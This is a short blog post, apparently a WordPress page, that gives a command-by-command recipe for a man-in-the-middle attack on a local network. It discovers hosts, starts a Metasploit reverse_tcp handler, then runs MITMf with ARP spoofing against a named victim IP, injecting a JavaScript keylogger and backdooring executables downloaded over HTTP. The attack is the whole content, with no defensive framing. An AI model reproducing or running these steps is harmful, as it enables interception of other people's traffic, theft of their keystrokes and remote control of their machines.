MSFCONSOLE + MIMTF INJECT BACKDOOR EXECUTABLES SENT OVER HTTP

Msfconsole + MIMTF Inject Backdoor executables sent over HTTP

INTERFACE = eth0
GATEWAY = IP ROUTE
VICTIM = 192.168.1.4
# netdiscover -i eth0
# /etc/init.d/postgresql start
# msfconsole -r msf-rc/windows_msf_reverse_tcp.rc
# msfconsole -q
msf > load msgrpc
# apt-get install mitmf
# gedit /usr/share/mitmf/config/mitmf.conf
find [[Metasploit]]
find [[[[WindowsIntelx86]]]]
# mitmf -i eth0 –spoof –arp –gateway 192.168.1.1 –target 192.168.1.4 –jskeylogger –filepwn

By  Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s